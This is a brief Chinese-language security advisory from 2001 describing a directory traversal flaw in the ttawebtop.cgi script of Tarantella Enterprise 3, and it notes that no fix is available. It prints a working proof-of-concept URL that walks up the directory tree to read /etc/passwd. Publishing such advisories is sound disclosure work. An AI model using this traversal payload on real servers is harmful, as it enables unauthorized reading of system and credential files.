Tarantella TTAWebTop.CGI存在任意文件可查看问题发布时间:2001-06-22 更新时间:2001-06-22 严重程度:高 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Tarantella Enterprise 3 3.1详细描述 ttawebtop.cgi这个CGI脚本设计用来允许用户点击连接来显示和恢复应用程序的, 其没有很好的对输入进行合法性检查,可造成远程绕过目录结构查看任何文件 内容。 测试代码 http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd 解决方案 尚无 相关信息 |